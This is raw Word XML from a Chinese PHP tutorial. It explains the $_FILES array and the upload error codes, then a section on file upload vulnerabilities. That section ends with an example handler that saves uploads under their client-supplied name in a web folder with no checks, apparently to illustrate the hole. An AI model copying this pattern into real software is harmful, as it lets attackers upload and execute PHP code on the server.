          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$_FILES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>数组的内容为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="303" w:lineRule="exact"/>
        <w:ind w:left="417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如果上传文件按钮的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6784"/>
        </w:tabs>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="415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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>&lt;input type="file"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>name="file"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="27"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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那么使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FILES[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'file'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>]['name']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>来获得客户端上传文件名称，不包含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w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>路径。使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FILES[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'file']['tmp_name']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>来获得服务端保存上传文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95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临时文件路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="417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存放上传文件的文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="422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PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不会直接将上传文件放到网站根目录中，而是保存为一个临时文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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>件，名称就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$_FILES['file']['tmp_name']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的值，开发者必须把这个临</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="9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时文件复制到存放的网站文件夹中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="17" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="417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w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FILES[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'file']['tmp_name']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的值是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>设置的，与文件原始名称不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99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一样，开发者必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$_FILES['</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>file']['name']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>来取得上传文件的原始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名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="417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上传文件时的错误信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="417"/>
        <w:jc w:val="both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w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FILES[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'file']['error']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>变量用来保存上传文件时的错误信息，它的值如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95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下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="both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0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9280" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:82pt;margin-top:-196.75pt;width:417.7pt;height:164.35pt;z-index:443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Borders>
                      <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
                      <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
                      <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
                      <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
                      <w:insideH w:val="single" w:sz="6" w:space="0" w:color="999999"/>
                      <w:insideV w:val="single" w:sz="6" w:space="0" w:color="999999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260"/>
                    <w:gridCol w:w="709"/>
                    <w:gridCol w:w="5363"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00292EF3">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="491"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2260" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="14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错误信息</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="709" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="141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数值</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="5363" w:type="dxa"/>
                        <w:tcBorders>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="143" w:right="1501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说</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr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明</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00292EF3">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="491"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2260" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79"/>
                          <w:ind w:left="14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UPLOAD_ERR_OK</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="709" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79"/>
                          <w:ind w:left="141"/>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="99"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>0</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="5363" w:type="dxa"/>
                        <w:tcBorders>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79"/>
                          <w:ind w:left="143" w:right="1501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没有错误</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00292EF3">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="491"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2260" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="14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UPLOAD_ERR_INI_SIZE</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="709" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="141"/>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="99"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>1</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="5363" w:type="dxa"/>
                        <w:tcBorders>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="143" w:right="1501"/>
                          <w:rPr>
                            <w:sz w:val="15"/>
                            <w:lang w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                            <w:lang w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>上传文件的大小超过</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                            <w:lang w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> php.ini </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                            <w:lang w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>的设置</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00292EF3">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="817"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2260" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="0"/>
                          <w:ind w:left="0"/>
                          <w:rPr>
                            <w:sz w:val="14"/>
                            <w:lang w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="0"/>
                          <w:ind w:left="14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UPLOAD_ERR_FROM_SIZE</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="709" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="0"/>
                          <w:ind w:left="0"/>
                          <w:rPr>
                            <w:sz w:val="14"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="0"/>
                          <w:ind w:left="141"/>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="99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5363" w:type="dxa"/>
                        <w:tcBorders>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79" w:line="302" w:lineRule="auto"/>
                          <w:ind w:left="143" w:right="1501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上传文件的大小超过</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> HTML </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>表单中</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> MAX_FILE_SIZE </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>的值</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00292EF3">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="491"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2260" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="14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UPLOAD_ERR_PARTIAL</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="709" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="141"/>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="99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5363" w:type="dxa"/>
                        <w:tcBorders>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:ind w:left="143" w:right="1501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只上传部分的文件</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00292EF3">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="491"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2260" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79"/>
                          <w:ind w:left="14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UPLOAD_ERR_NO_FILE</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="709" w:type="dxa"/>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79"/>
                          <w:ind w:left="141"/>
                          <w:rPr>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="99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5363" w:type="dxa"/>
                        <w:tcBorders>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                      </w:tcPr>
                      <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:before="79"/>
                          <w:ind w:left="143" w:right="1501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没有文件上传</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3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rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="1795" w:firstLine="420"/>
        <w:jc w:val="both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如果提供给网站访问者上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传图片</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的功能，那必须小心访问者上传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的实际可能不是图片，而是可以指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-27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PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-25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程序。如果存放图片的目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录是一个开放的文件夹，则入侵者就可以远程执行上传的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-50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文件来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进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9279" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:19.25pt;width:319.25pt;height:252.15pt;z-index:440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7" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:sz w:val="21"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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 xml:space="preserve">&lt;?php // </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>设置上传文件的目录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$uploaddir = "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>D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:/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www/images/";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 xml:space="preserve">//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检查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file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是否存在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(isset($_FILES['file1']))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{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 xml:space="preserve">//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要放在网站目录中的完整路径，包含文件名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$uploadfile = $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uploaddir .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'file1']['name'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact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 xml:space="preserve">// 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将服务器存放的路径，移动到真实文件名</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> move_uploaded_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>file(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$_FILES['file1']['tmp_name'], $uploadfile);</w:t>
                  </w:r>
                </w:p>
